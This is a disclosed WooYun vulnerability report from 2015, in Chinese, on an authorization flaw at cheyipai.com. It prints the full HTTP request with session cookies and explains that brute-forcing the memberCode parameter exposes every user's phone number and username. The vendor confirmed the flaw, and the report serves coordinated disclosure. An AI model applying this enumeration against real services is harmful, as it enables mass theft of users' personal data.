当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144742

漏洞标题:车易拍某处存在逻辑漏洞导致全站用户手机号泄露

相关厂商:cheyipai.com

漏洞作者: 沦沦

提交时间:2015-10-04 14:43

修复时间:2015-11-22 15:10

公开时间:2015-11-22 15:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-04: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

GET /usermain/GetUserInfo?CurrentSessionId=655376a9-1d4a-4322-a5f7-ae160d0a146b&optStatusCode=D7E3F8AB-1D93-4047-8A13-777164D99A0C&memberCode=US001691&_=1443932473804 HTTP/1.1
Host: www.cheyipai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.cheyipai.com/user/index
Cookie: Hm_lvt_11a0d0462736ffe428c2decbb869ef07=1443931424; Hm_lpvt_11a0d0462736ffe428c2decbb869ef07=1443932398; Hm_lvt_c8752f1ed50be0798e275b8114081c89=1443931424; Hm_lpvt_c8752f1ed50be0798e275b8114081c89=1443932398; _adksh=1443931425481; _adkse=1802636bb006633554ef745b4fe8d1ab; _adksd=direct; _adksb=1443934199521; _adksc=1443931425481; _adksf=%26_u%3D0%26_a%3D0%26_k%3D0%26_s%3D0; _adksa=130025103.218070697.1443931425497.1443931425497.1443931425497; LoginValidCode=DJ5D; OW_RememberMe=per1sh; sid=655376a9-1d4a-4322-a5f7-ae160d0a146b; logininfo=pGM72YxKGoFFwiBYCN3rwMrgKfHC69mEk4Okz7k/qPJ+NZKnsytNkDA/8LBtYQu1yK95tp1t2zlAlrxxRNSKLgWuUh5+xC5FCon+TtkOD29RaNAZC1uKeVr/nZC2gHt6HSzq5ESMib58tK+suAHKSc/qM//+zOjqdFz8QuRGkwSSge9W4xFttwB0WOqNofYRM9r7SOIkZZp0r/cUHqwKbwuO3xaU8BZ6b1eitRvPwKjMIajvyD8/hXXepjSRuphA1r7gAoqWVj+vt2+O4JkSfGJ3F2aaLOIZKNS1Mmfu4YOOjsPfszEj1CO2EujD2d7aWE6eTOL6Q431oYGEfHF7M0ehfgVe+qif6VWt7agpQzRq/hk7Ym/Z0gwe+CTtB/qsDm3oNzESswian5n+hHlHJRfalsEljMPjKX9jJKrZ5ZN3xHqCBga1ANKjXp0xMFnzPg2o4xp8gIGs+HCZv8r2EKt2goeXpV8jT2SAZZV1KYfOb5DU20hjnyjFwFhQqF0bEU8bH57IolKbQIm61zTTDPPmmy6ozRsa64znYID64qAKeElx/mgbVpEX//JSOm8smlYechRxfDUb/qYUC3tg0dmyG6KHjg9IS1Bbi5CXct0rfIL7m4ECMQ==; loginSessionID=655376a9-1d4a-4322-a5f7-ae160d0a146b
X-Forwarded-For: 8.8.8.8
Connection: close


用户信息memberCode参数没进行权限控制可进行平行越权查看他人手机号与用户名

01.jpg


只要我们对memberCode参数后四位数字从0000到9999全跑一遍,就可把全站用户手机号导出来

02.png


03.jpg

漏洞证明:

用户信息memberCode参数没进行权限控制可进行平行越权查看他人手机号与用户名

01.jpg


只要我们对memberCode参数后四位数字从0000到9999全跑一遍,就可把全站用户手机号导出来

02.png


03.jpg

修复方案:

越权控制好

版权声明:转载请注明来源 沦沦@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-08 15:09

厂商回复:

感谢提交

最新状态:

暂无